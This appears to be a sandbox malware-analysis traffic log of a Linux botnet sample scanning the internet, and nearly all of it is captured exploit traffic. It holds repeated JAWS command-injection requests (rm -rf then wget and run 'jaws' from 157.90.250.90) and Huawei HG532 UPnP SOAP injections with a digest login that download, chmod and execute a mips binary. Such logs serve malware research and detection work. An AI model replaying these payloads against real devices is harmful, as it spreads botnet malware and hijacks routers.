                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          249192.168.2.2346464167.82.120.6680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.487382889 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.642430067 CET167INHTTP/1.1 400 Bad Request
                                                          Connection: close
                                                          Content-Length: 11
                                                          content-type: text/plain; charset=utf-8
                                                          x-served-by: cache-bur-kbur8200145
                                                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                          Data Ascii: Bad Request


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          250192.168.2.234473459.49.86.22580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.489026070 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.822945118 CET355INHTTP/1.1 403 Forbidden
                                                          Server: Byte-nginx
                                                          Date: Tue, 02 Jan 2024 05:24:27 GMT
                                                          Content-Type: application/octet-stream
                                                          Connection: keep-alive
                                                          Byte-Error-Code: 0060
                                                          Content-Length: 24
                                                          via: cache05.sxtyct02
                                                          x-request-ip: 212.102.41.2
                                                          x-tt-trace-tag: id=5
                                                          x-response-cinfo: 212.102.41.2
                                                          x-response-cache: miss
                                                          Data Raw: 31 32 37 2e 30 2e 30 2e 31 20 63 6f 6e 66 20 6e 6f 74 20 66 6f 75 6e 64
                                                          Data Ascii: 127.0.0.1 conf not found


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          251192.168.2.234472094.250.243.680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.687612057 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:27.937510967 CET148INHTTP/1.0 302 Moved Temporarily
                                                          Location: https:///shell?cd+/tmp;rm+-rf+*;wget+
                                                          Server: BigIP
                                                          Connection: close
                                                          Content-Length: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          252192.168.2.235542891.146.142.15180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.710943937 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          253192.168.2.23588608.134.23.4380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.781954050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:28.093302965 CET320INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.20.2
                                                          Date: Tue, 02 Jan 2024 05:24:27 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 153
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          254192.168.2.2338508156.254.103.5537215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:27.790071011 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:29.356627941 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:31.212368011 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:34.955811024 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:42.378771067 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:57.224679947 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:27.684396982 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
